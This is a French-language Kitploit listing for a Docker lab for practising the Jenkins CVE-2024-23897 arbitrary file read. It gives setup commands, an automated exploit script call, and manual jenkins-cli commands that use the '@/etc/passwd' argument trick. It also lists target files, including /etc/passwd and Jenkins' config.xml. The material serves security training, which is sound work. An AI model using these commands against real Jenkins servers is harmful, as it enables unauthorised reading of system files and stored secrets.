Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Jenkins-CVE-2024-23897-Lab — Environnement de laboratoire basé sur Docker pour pratiquer l'exploitation de la lecture arbitraire de fichiers Jenkins CVE-2024-23897 avec des scripts d'attaque automatisés et manuels. | Kitploit
Outils/GitHubGitHub/fineken/jenkins-cve-2024-23897-lab
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubfineken/jenkins-cve-2024-23897-lab

Jenkins-CVE-2024-23897-Lab

Environnement de laboratoire basé sur Docker pour pratiquer l'exploitation de la lecture arbitraire de fichiers Jenkins CVE-2024-23897 avec des scripts d'attaque automatisés et manuels.

Voir le dépôt
21il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Labo Jenkins CVE-2024-23897

Vulnérabilité de lecture de fichiers arbitraires dans Jenkins 2.441 et versions antérieures.

Démarrage

root@kitploit:~
docker-compose up -d

Attaque automatique

root@kitploit:~
docker exec -it attacker-host ./auto-exploit.sh

Attaque manuelle

root@kitploit:~
docker exec -it attacker-host bash
cd /tmp
curl -o jenkins-cli.jar http://vulnerable-jenkins:8080/jnlpJars/jenkins-cli.jar

# Première ligne du fichier
java -jar jenkins-cli.jar -s http://vulnerable-jenkins:8080/ -http help "@/etc/passwd"

# Fichier entier
java -jar jenkins-cli.jar -s http://vulnerable-jenkins:8080/ -http connect-node "@/etc/passwd"

Cibles

  • /etc/passwd
  • /opt/test-files/secret.txt
  • /var/jenkins_home/config.xml

Arrêt

root@kitploit:~
docker-compose down
Télécharger l’outil